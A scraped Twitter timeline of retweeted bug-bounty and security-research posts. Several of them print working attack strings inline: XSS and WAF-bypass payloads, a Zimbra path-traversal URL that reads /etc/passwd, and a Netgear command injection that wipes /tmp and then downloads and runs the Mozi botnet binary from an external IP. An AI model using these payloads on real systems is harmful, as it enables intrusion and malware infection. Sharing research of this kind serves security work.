Tweetovi
- Tweetovi, trenutna stranica.
- Tweetovi i odgovori
- Medijski sadržaj
Blokirali ste korisnika/cu @YongShao_feng
Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @YongShao_feng
-
YongShao proslijedio/la je Tweet
Wow! "Resources for Beginner Bug Bounty Hunters" has over 1000 stars on GitHub now and we just pushed a new update! Check it out:https://github.com/nahamsec/Resources-for-Beginner-Bug-Bounty-Hunters/ …
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
YongShao proslijedio/la je Tweet
Payloads collection:- Command Injection:- https://github.com/payloadbox/command-injection-payload-list … XSS Payloads:- https://github.com/payloadbox/xss-payload-list … XXE Payload List:- https://github.com/payloadbox/xxe-injection-payload-list … SQLI Payload List:- https://github.com/payloadbox/sql-injection-payload-list … RFI/LFI :- https://github.com/payloadbox/rfi-lfi-payload-list … Open Redirect:- https://github.com/payloadbox/open-redirect-payload-list …
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
YongShao proslijedio/la je Tweet
New
@OutflankNL tool coming soon... Zipper, a CobaltStrike tool written in C which allows you to compress files and folders from local and UNC paths. Useful for RedTeams when large files/folders need to be exfiltrated.pic.twitter.com/HA0ceyw6Mq
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
YongShao proslijedio/la je TweetHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi
-
YongShao proslijedio/la je Tweet
Observed a weird WAF bypass case: > WAF blocked <img> tag > 'src' attr got blocked too > Found WAF didn't block <image> Finally crafted: <image src\r\n=valid.jpg onloadend='new class extends (co\u006efir\u006d)/**/`` {}'> > BOOM
#infosec#bugbounty#bugbountytipspic.twitter.com/4EkiATn79Q
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
YongShao proslijedio/la je Tweet
P1 on new year (zimbra LFI) [http://victim.com ]/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../etc/passwd%00
#bugbounty#togetherwehitharder#bugbountytips#bugbountytippic.twitter.com/NH7meUlaH0
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
YongShao proslijedio/la je Tweet
Exploiting Wi-Fi stack on Tesla Model S. Details of vulnerabilities and exploition:https://keenlab.tencent.com/en/2020/01/02/exploiting-wifi-stack-on-tesla-model-s/ …
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
YongShao proslijedio/la je Tweet
Why not step into the next decade with WAF bypasses? Here are some gifts.
- Imperva
<a69/onclick=write()>pew
- DotDefender
<a69/onclick=[0].map(alert)>pew
- Cloudbric
<a69/onclick=[1].findIndex(alert)>pew
Happy 0x32303230.
#infosec#bugbounty#bugbountytipspic.twitter.com/74KGzwMqME
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
YongShao proslijedio/la je TweetHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi
-
YongShao proslijedio/la je Tweet
If you look into the right place, even Google can make some easy mistakes

Check it outhttps://ngailong.wordpress.com/2019/12/19/google-vrp-ssrf-in-google-cloud-platform-stackdriver/ …Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
世上本无圣诞老人
所有的惊喜跟礼物
都来源于爱你的我
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
YongShao proslijedio/la je Tweet
Writeup on how I made $40,000 breaking the new Chromium Edge using essentially two XSS flaws.https://leucosite.com/Edge-Chromium-EoP-RCE/ …
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
YongShao proslijedio/la je Tweet
New writeup, one of my favorite bugs
-
Filling in the Blanks: Exploiting Null Byte Buffer Overflow for a $40,000 Bounty
https://samcurry.net/filling-in-the-blanks-exploiting-null-byte-buffer-overflow-for-a-40000-bounty/ …
Featuring...
@d0nutptr@0xacb@Regala_@JLLiS@Yassineaboukir@plmaltaispic.twitter.com/RomLgdCcSC
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
YongShao proslijedio/la je Tweet
AirDoS: Found a bug in iOS that lets you make nearby devices unusable through AirDrop: https://kishanbagaria.com/airdos/
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
YongShao proslijedio/la je Tweet
Learn how found and exploited SockPuppet for iOS 12.4, featuring a bonus collaboration with LiveOverflow! https://googleprojectzero.blogspot.com/2019/12/sockpuppet-walkthrough-of-kernel.html …https://www.youtube.com/watch?v=YV3jewkUJ54 …
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
YongShao proslijedio/la je Tweet
An ancient Struts2 RCE vulnerability, CVE-2012-1592, the statement was updated by RedHat several days ago. https://access.redhat.com/security/cve/cve-2012-1592 …pic.twitter.com/e9G1aMxSPR
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
YongShao proslijedio/la je Tweet
A WAF bypass payload by
@JayateerthaG <img src=something onauxclick="new Function `al\ert\`xss\``">Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
YongShao proslijedio/la je Tweet
Intresting.. /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://112.17.163.139:35681/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
YongShao proslijedio/la je Tweet
Tunneling traffic through MySQL service (or your mysqld is my new SOCKS5) by
@TheXC3LL https://x-c3ll.github.io/posts/Pivoting-MySQL-Proxy/ … My old MySQL UDF PoCs are still hot
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
YongShao proslijedio/la je Tweet
GitHub - Symbo1/HackerOne-Staffs: 300+company -> 3k+Staffshttps://github.com/Symbo1/HackerOne-Staffs …
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi
Čini se da učitavanje traje već neko vrijeme.
Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.
